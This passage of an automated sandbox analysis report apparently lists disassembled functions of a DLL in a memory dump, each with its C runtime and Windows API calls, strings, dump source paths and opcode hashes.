                                                                                                                                                                                                                                              • Instruction ID: 65b2febc3eb3f1147c8a9338238481281bdf52973e10a1a2249d15ae3b9e2f5a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 047420abe9ee7cce157ccbaf687569cfdcf046114a5d512995e3d82a02e49ede
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1811CE31A09344AEC700DFAD884058BFBE4FFE6248F400A6EF8855BB51DB35994DCB96
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF0B5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CF0B605
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF0B634
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                                                              • API String ID: 1785806476-3788999226
                                                                                                                                                                                                                                              • Opcode ID: 776cc0642f60a7cd392e46fe07b9248f30ccfb64e7a586b518bef26e3e5b4f95
                                                                                                                                                                                                                                              • Instruction ID: 9215b88bbe6d84ba7046c075ff07096b08183ba1455ab0e5bd6c893916686795
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 776cc0642f60a7cd392e46fe07b9248f30ccfb64e7a586b518bef26e3e5b4f95
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 500184B26002059FD724DEA9DCD1CABB3E8EB546547144E2DE99BC3B50EA71F9048B60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF34230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CF34241
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF34277
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                              • String ID: vector<bool> too long
                                                                                                                                                                                                                                              • API String ID: 1785806476-842332957
                                                                                                                                                                                                                                              • Opcode ID: 8ff7d35b10f1d9f9dbbecf419822b3f55bd8f423d65d4df43d79bb382b48c8fd
                                                                                                                                                                                                                                              • Instruction ID: 0896ed472bc43632fb53706e109bc1d37079463dd1b8725adac0d760f322ec53
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ff7d35b10f1d9f9dbbecf419822b3f55bd8f423d65d4df43d79bb382b48c8fd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B901F772A001156BC704CF69DCD08AEFBA9FB84358F51432AE51A97A50EB35ED18CBE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF33840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CF33855
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF33880
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                                                              • API String ID: 1785806476-3788999226
                                                                                                                                                                                                                                              • Opcode ID: 77763bfe23165d06f4809488915cb5918f22ed1d01f2024e076073e771337123
                                                                                                                                                                                                                                              • Instruction ID: 64c69f94572cd508a91a5dbc0ca296c63eb905f95fabeef68e4415521eae8d49
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77763bfe23165d06f4809488915cb5918f22ed1d01f2024e076073e771337123
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B501B572500615AFD310DEA9C884C9AB3E89F442143104A3DD49EC3B50EA70F80887A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE5160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CEE5173
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CEE519E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                                                              • API String ID: 1785806476-3788999226
                                                                                                                                                                                                                                              • Opcode ID: eb8459a70901b7f5fcc7f539db4a52b3e5a2a1a28e666759185f43e2ab5d5b25
                                                                                                                                                                                                                                              • Instruction ID: 6b6daf09f2f834969589821cf0a70a6767b19b90871e0695b16233713a83f673
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8459a70901b7f5fcc7f539db4a52b3e5a2a1a28e666759185f43e2ab5d5b25
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C801A7B26016059FD724CEA9CCD186BB3E8EB543487244A2DE89AC3B40EB31F904CB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF3BFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF3ABC3: __getptd.LIBCMT ref: 6CF3ABC9
                                                                                                                                                                                                                                                • Part of subcall function 6CF3ABC3: __getptd.LIBCMT ref: 6CF3ABD9
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6CF3BFC3
                                                                                                                                                                                                                                                • Part of subcall function 6CF3EAE6: __getptd_noexit.LIBCMT ref: 6CF3EAE9
                                                                                                                                                                                                                                                • Part of subcall function 6CF3EAE6: __amsg_exit.LIBCMT ref: 6CF3EAF6
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6CF3BFD1
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                                                                                                                                                                                                              • Instruction ID: 80bedbee1c39ff54ef1f53717cc765e74b8c9501d469853b541a240e3e64fbfc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F01A2B4801334AFDF24AF62D440A9DB7F5BF08318F243A1DD09996A50CB388584CBC0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF43EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: NameName::
                                                                                                                                                                                                                                              • String ID: {flat}
                                                                                                                                                                                                                                              • API String ID: 1333004437-2606204563
                                                                                                                                                                                                                                              • Opcode ID: ba8d44855950b338915e1413ac10316e50280d03b653cb8d934508eab7c16119
                                                                                                                                                                                                                                              • Instruction ID: 75deeb5f290d5a1aa9bc90b15e8346b163f27ff01be8a9eee147a6586bdc470b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba8d44855950b338915e1413ac10316e50280d03b653cb8d934508eab7c16119
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BF01C711552449BCB01DF58D495BE83FA19B42759F04C085EA5C0FA52C772984AC765
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEC4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 6CEEC4A4
                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(00000000,/5l), ref: 6CEEC4AF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$CopyInit
                                                                                                                                                                                                                                              • String ID: /5l
                                                                                                                                                                                                                                              • API String ID: 4248132287-2072523891
                                                                                                                                                                                                                                              • Opcode ID: adc15c170a95b2fd916eaae21d76979b6d3de3f5e8b44ac65a44afcc726e943b
                                                                                                                                                                                                                                              • Instruction ID: 00bd7949cd36d28feb9de3c310b8fef3e71361df426ba4ef2663efaa793f0289
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: adc15c170a95b2fd916eaae21d76979b6d3de3f5e8b44ac65a44afcc726e943b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BD012757005146796026AA5CC0CEDB7F7C9F266813454011FB14C2700EB38D524AAE5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE7673 Relevance: 5.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,FF0C5935), ref: 6CEE76AD
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,FF0C5935), ref: 6CEE76FF
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(FF0C5935,?,?,?,FF0C5935), ref: 6CEE770D
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(FF0C5935,?,00000000,?,?,?,?,FF0C5935), ref: 6CEE772A
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                                • Part of subcall function 6CEE6D40: _rand.LIBCMT ref: 6CEE6DEA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 119520971-0
                                                                                                                                                                                                                                              • Opcode ID: c48fc7b80eca2d37ed77392e6e54e582a331478b1f0fd7dc44faec1ef8f717c8
                                                                                                                                                                                                                                              • Instruction ID: 48351fd32e913b4e9865296cc1cfb5573148a9adaba62f99b8b6c8a6f6a900d7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c48fc7b80eca2d37ed77392e6e54e582a331478b1f0fd7dc44faec1ef8f717c8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4218771900609AFCB10DF55DC44EDBB7BDFF55298F20462AE91697B40EB70AA05CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE7680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,FF0C5935), ref: 6CEE76AD
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,FF0C5935), ref: 6CEE76FF
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(FF0C5935,?,?,?,FF0C5935), ref: 6CEE770D
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(FF0C5935,?,00000000,?,?,?,?,FF0C5935), ref: 6CEE772A
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                                • Part of subcall function 6CEE6D40: _rand.LIBCMT ref: 6CEE6DEA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 119520971-0
                                                                                                                                                                                                                                              • Opcode ID: ae8c3879c3b01c955f17e592de7dc2317a20a52a22d4da7619fcc115e73a0b08
                                                                                                                                                                                                                                              • Instruction ID: 01c1934b893801a5edcee877a0499323ec1205ff840bafb88012e6b734346f01
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae8c3879c3b01c955f17e592de7dc2317a20a52a22d4da7619fcc115e73a0b08
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC219971900609AFCB10DF55CC44EDBB7BCFF55298F20462AE916D7B40EB70AA05C7A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE9580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?), ref: 6CEE95A9
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6CEE95CA
